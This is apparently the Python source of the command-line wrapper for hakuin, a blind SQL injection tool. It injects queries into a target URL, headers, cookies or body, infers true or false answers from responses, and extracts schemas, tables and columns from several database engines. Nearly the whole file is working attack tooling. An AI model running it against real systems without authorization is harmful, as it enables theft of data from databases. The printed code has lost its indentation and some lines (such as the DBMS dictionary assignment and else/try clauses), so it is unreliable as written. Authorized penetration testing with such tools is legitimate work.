mirror of https://github.com/pruzko/hakuin synced 2024-09-19 02:41:35 +02:00
2024-01-04 09:44:52 +01:00

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import argparse
import json
import logging
import re
import requests
import sys
from hakuin.dbms import SQLite, MySQL, MSSQL, PSQL
from hakuin import Extractor, Requester
class BytesEncoder(json.JSONEncoder):
def default(self, o):
return o.hex() if isinstance(o, bytes) else super().default(o)
class UniversalRequester(Requester):
RE_INFERENCE = re.compile(r'^(not_)?(.+):(.*)$')
RE_QUERY_TAG = re.compile(r'{query}')
def __init__(self, args):
self.url = args.url
self.method = args.method
self.headers = self._process_dict(args.headers)
self.cookies = self._process_dict(args.cookies)
self.body = args.body
self.inference = self._process_inference(args.inference)
self.dbg = args.dbg
self.n_requests = 0
def _process_dict(self, dict_str):
if dict_str is None:
return {}
dict_str = json.loads(dict_str)
assert type(dict_str) is dict, 'Headers/cookies must be defined as a dictionary.'
return {str(k): str(v) for k, v in dict_str.items()}
def _process_inference(self, inference):
m = self.RE_INFERENCE.match(inference)
inf = {
'type': m.group(2),
'content': m.group(3),
'is_negated': m.group(1) is not None,
assert inf['type'] in ['status', 'header', 'body'], f'Unknown inference type: "{inf["type"]}"'
if inf['type'] == 'status':
inf['content'] = int(inf['content'])
return inf
def request(self, ctx, query):
self.n_requests += 1
url = self.RE_QUERY_TAG.sub(requests.utils.quote(query), self.url)
headers = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.headers.items()}
cookies = {self.RE_QUERY_TAG.sub(query, k): self.RE_QUERY_TAG.sub(query, v) for k, v in self.cookies.items()}
body = self.RE_QUERY_TAG.sub(query, self.body) if self.body else None
resp = requests.request(method=self.method, url=url, headers=headers, cookies=cookies, data=body)
if self.inference['type'] == 'status':
result = resp.status_code == self.inference['content']
elif self.inference['type'] == 'header':
result = any(self.inference['content'] in v for v in resp.headers.keys() + resp.headers.values())
elif self.inference['type'] == 'body':
result = self.inference['content'] in resp.content.decode()
if self.inference['is_negated']:
result = not result
if self.dbg:
print(result, '(err)' if resp.status_code == 500 else '', query, file=sys.stderr)
return result
class HK:
'sqlite': SQLite,
'mssql': MSSQL,
'mysql': MySQL,
'psql': PSQL,
def __init__(self, args):
requester = UniversalRequester(args)
dbms = self.DBMS_DICT[args.dbms]()
self.ext = Extractor(requester, dbms)
def main(self, args):
if args.schema:
res = self.ext.extract_schema(strategy=args.schema_strategy)
elif args.column:
res = self.ext.extract_column(table=args.table, column=args.column, text_strategy=args.text_strategy)
elif args.table:
res = self.extract_table(table=args.table, schema_strategy=args.schema_strategy, text_strategy=args.text_strategy)
res = self.extract_tables(schema_strategy=args.schema_strategy, text_strategy=args.text_strategy)
print(f'Number of requests: {self.ext.requester.n_requests}')
print(json.dumps(res, cls=BytesEncoder, indent=4))
def extract_schema(self):
return self.ext.extract_schema(strategy=self.args.schema_strategy)
def extract_tables(self, schema_strategy, text_strategy):
res = {}
for table in self.ext.extract_table_names(strategy=schema_strategy):
res[table] = self.extract_table(table, schema_strategy, text_strategy)
return res
def extract_table(self, table, schema_strategy, text_strategy):
res = {}
for column in self.ext.extract_column_names(table=table, strategy=schema_strategy):
res[column] = self.ext.extract_column(table=table, column=column, text_strategy=text_strategy)
except Exception as e:
logging.error(f'Failed to extract "{table}.{column}": {e}')
return res
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='A simple wrapper to easily call Hakuin\'s basic functionality.')
parser.add_argument('url', help='URL pointing to a vulnerable endpoint. The URL can contain the {query} tag, which will be replaced with injected queries.')
parser.add_argument('-d', '--dbms', required=True, choices=HK.DBMS_DICT.keys(), help='Assume this DBMS engine.')
parser.add_argument('-M', '--method', choices=['get', 'post', 'put', 'delete', 'head', 'patch'], default='get', help='HTTP request method.')
parser.add_argument('-H', '--headers', help='Headers attached to requests. The header names and values can contain the {query} tag.')
parser.add_argument('-C', '--cookies', help='Cookies attached to requests. The cookie names and values can contain the {query} tag.')
parser.add_argument('-B', '--body', help='Request body. The body can contain the {query} tag.')
parser.add_argument('-i', '--inference', required=True, help=' '.join('''
Inference method that determines the results of injected queries. The method must be in the form of "<TYPE>:<CONTENT>", where the <TYPE>
can be "status", "header", or "body" and the <CONTENT> can be a status code or a string to look for in HTTP responses. Also, the <TYPE>
can be prefixed with "not_" to negate the expression. Examples: "status:200" (check if the response status code is 200), "not_status:404"
(the response status code is not 404), "header:found" (the response header name or value contains "found"), "body:found" (the response body
contains "found").
parser.add_argument('-t', '--table', help='Table to extract.')
parser.add_argument('-c', '--column', help='Column to extract.')
parser.add_argument('-s', '--schema', action='store_true', help='Extract only schema.')
parser.add_argument('--schema_strategy', choices=['binary', 'model'], default='model', help='Use this strategy to extract schema.')
parser.add_argument('--text_strategy', choices=['binary', 'unigram', 'fivegram', 'dynamic'], default='dynamic', help='Use this strategy to extract text columns.')
# parser.add_argument('-o', '--out', help='Output directory.')
parser.add_argument('--dbg', action='store_true', help='Print debug information to stderr.')
args = parser.parse_args()
if args.schema:
assert not args.table and not args.column, 'Cannot combine the --schema and --table/--column options.'
if args.column:
assert args.table, 'You must specify --table when using --column.'